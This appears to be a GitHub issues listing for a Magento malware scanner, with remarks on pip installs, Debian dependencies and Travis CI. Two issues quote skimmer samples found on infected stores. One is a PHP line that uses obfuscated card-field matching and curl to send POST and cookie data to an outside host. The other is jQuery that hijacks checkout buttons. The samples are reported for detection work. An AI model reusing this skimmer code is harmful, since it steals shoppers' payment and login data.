magento-malware-scanner icon indicating copy to clipboard operation
magento-malware-scanner copied to clipboard

Scanner, signatures and the largest collection of Magento malware

Results 7 magento-malware-scanner issues
Sort by recently updated
recently updated
newest added

you need to check if python packages already installed and managed with yum or apt, instead of re-installing them with pip. this will break other python projects.

The documentation for usage notes that python-pip, gcc and python-dev are required for install, however you also need python-setuptools on Debian Stretch for the "pip install" to succeed

From app/code/core/Mage/Core/functions.php ``` if (preg_match("/".base64_decode('Zmlyc3RuYW1lfGN2YzJ8Y2NfbnVtYmVyfHVzZXJuYW1lfGNjX3xzaGlwcGluZ3xjdnZ8bW9udGh8ZHVtbXl8c2VjdXJldHJhZGluZ3x5ZWFyfGxvZ2lufGJpbGxpbmd8ZXhwaXJ5fHBheW1lbnR8Y2FyZF9udW1iZXI=')."/i", serialize($_POST))) - @shell_exec("curl --data \"version=1&encode=".base64_encode( serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".trim(base64_decode('aHR0cDovL3ZlcnBheW1lbnQuY29tL3Rlc3RTZXJ2ZXIucGhw'))." > /dev/null 2

https://blog.travis-ci.com/2017-08-31-trusty-as-default-status Probably need to verify whether the default yara packages for Trusty are sufficient.

it was adding following code in some of js in our case it was quickview.js and ccard.js ``` jQuery(document).ready(function() { if(!(document.cookie.indexOf("userpayid") + 1)) { jQuery("*[onclick^=\"shippingMethod.save()\"]").attr("onclick", "paynow_right();"); jQuery("*[onclick^=\"checkout.save();\"]").attr("onclick", "paynow_right();"); jQuery("*[onclick=\"payment.save()\"]").attr("onclick", "paynow_right();");...

There's a malware sharing platform called "MISP" (or https://github.com/MISP), which might provide a more useful structure for sharing these samples than GitHub. Found through https://twitter.com/da_667/status/832217900127834112